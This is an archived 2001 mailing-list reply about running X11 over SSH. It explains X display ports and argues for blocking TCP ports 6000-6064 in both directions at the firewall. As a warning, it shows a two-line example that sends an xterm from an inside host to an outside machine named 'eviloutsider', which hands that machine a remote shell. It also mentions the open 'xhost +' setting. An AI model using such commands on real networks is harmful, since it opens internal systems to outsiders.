Re: X Window over SSH

From: Rajeev Kumar (
Date: 08/10/01

Message-ID: <>
Date: Fri, 10 Aug 2001 10:13:03 -0400
From: Rajeev Kumar <>
To: Greg Saoutine <>
Subject: Re: X Window over SSH

        As you know X11 works in sort of reverse way as far as user perception of client/server
matters. Once you are running X server on your machine it runs default on port 6000 but
this can be relocated and in case of more than one display attached to you machine you can
run X server listening to more than one port i.e 6000 for 1st display, 6001 for second
display and so on. User on remote end throwing display on your machine will the setup
environment variable like:

setenv DISPLAy yourhost:0.0 (for firt display at port 6000)
setenv DISPLAy yourhost:0.1 (for 2nd display, at port 6001)

Generally you know xhost command can be used on server side to control access to your X
server, but in general user run something like xhost + and leaving their X server open to all.

Now very important part on firewall side:
[1] You surely block incoming port 6000-6064 (assuming nobody will run X server above
6064), so that will protect your inside users. I guess everybody does this by default
these days.

!!!!!!!! IMPORTANT !!!!!!!!!!
[2] This one is important:
                You should also block outgoing 6000-6064 ports on your firewall. if you don't do this (and I
know many company open all outgoing access) then anybody from inside your network can do
something like this.

inside% setenv DISPLAY eviloutsider:0.0
inside% xterm&

i.e that will give xterm to eviloutsider on your network machine. and user on evisoutsider
machine then can do anything your inside users can do. like fireup web browser and looking
to your intranet.

        This is also very dangerous even if you are using NAT. Generally people think if you using
NAT(Hide NATin Checkpoint or Linux MASQ NAT) you are safe. Because nobody can connect to
you from outside. Now see above in in NATed networks users from inside can provide xterm
(or any X application) to outsider (since connection is from inside to outside). So in any
case block 6000-6064 always (incoming/outgoing )

With SSH you can port forward X11 traffic over SSH channel. So that is safe. Means only
ssh users can fireup X service and those are trusted :-)

I hope this helps.

Greg Saoutine wrote:
> My colleague came across the following within one of Sun's Newsgroups:
> [snip]
> Xsun currently provides no way to disable listening for TCP connections.
> If you need to worry about keeping people from connecting to the port,
> you will need to use some sort of firewall software to block them.
> [snip]
> Does it mean that the only way to *effectively* pipe X via SSH port 22
> is to set up a FW in front of the Sun box blocking port 6000? Any other
> ideas/solutions?
> Thank you,
> Greg Saoutine
> _________________________________________________________________
> Get your FREE download of MSN Explorer at

Relevant Pages

  • Re: SSH: remote login returns "invalid user"
    ... host ... server rather than web server? ... If they have the right server software running (mail, web, ssh daemon) then that software picks up the request. ... When you want to send mail to xxx@xxxxxxxxxxxxxxxxxxxxxxx, your mail server looks up the MX record for hartley-consultants and sends it to port 25 on the machine pointed to. ...
  • Re: ipfw and nmap
    ... > even be correct but I have a bsd box that is simply providing me SSH ... add allow tcp from any to me 22 setup in via fxp0 keep-state ... Note too that there is nothing to prevent port scanners simply setting ... the 'SYN' flag in the probe packets they send to your server. ...
  • Re: Remote Desktop directly to another computer on the network
    ... default port... ... And there is no reason for me to believe that ssh ... When I have a multibillion company I will use the key pair, ... WinSCP for that to access my home SSH server. ...
  • Re: need help for setting SSH Server for Windows XP
    ... In my windows firewall proper ports are opened. ... Changing from port 22 to ports 80, 443 also doesn't give any results. ... static LAN IP of the server PC. ... It is *NOT* a valid test to call the SSH server PC from another ...
  • Re: Port Forwarding -- Checking to be sure I understand it
    ... They run an ssh ... server and VNC service. ... If you want to run the tunnel over some port other than 22 (the ... restrictive firewalls that deny all incoming connections and block most ...